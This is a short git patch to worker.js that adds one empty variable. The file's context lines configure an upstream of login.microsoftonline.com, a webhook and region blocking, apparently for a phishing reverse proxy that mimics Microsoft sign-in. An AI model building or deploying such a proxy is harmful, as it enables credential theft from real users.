From 3ee6712069ba8b5bd0961339e9cc881ee54ac5fc Mon Sep 17 00:00:00 2001 From: Just Hacked <49268327+just-hacked@users.noreply.github.com> Date: Wed, 13 Mar 2024 09:57:30 +0530 Subject: [PATCH] Update worker.js variable missing --- worker.js | 1 + 1 file changed, 1 insertion(+) diff --git a/worker.js b/worker.js index dd070d9..7731cc9 100644 --- a/worker.js +++ b/worker.js @@ -3,6 +3,7 @@ const upstream = 'login.microsoftonline.com' const upstream_path = '/' const https = true const webhook = "" +let connection_upgrade = "" // Blocking const blocked_region = []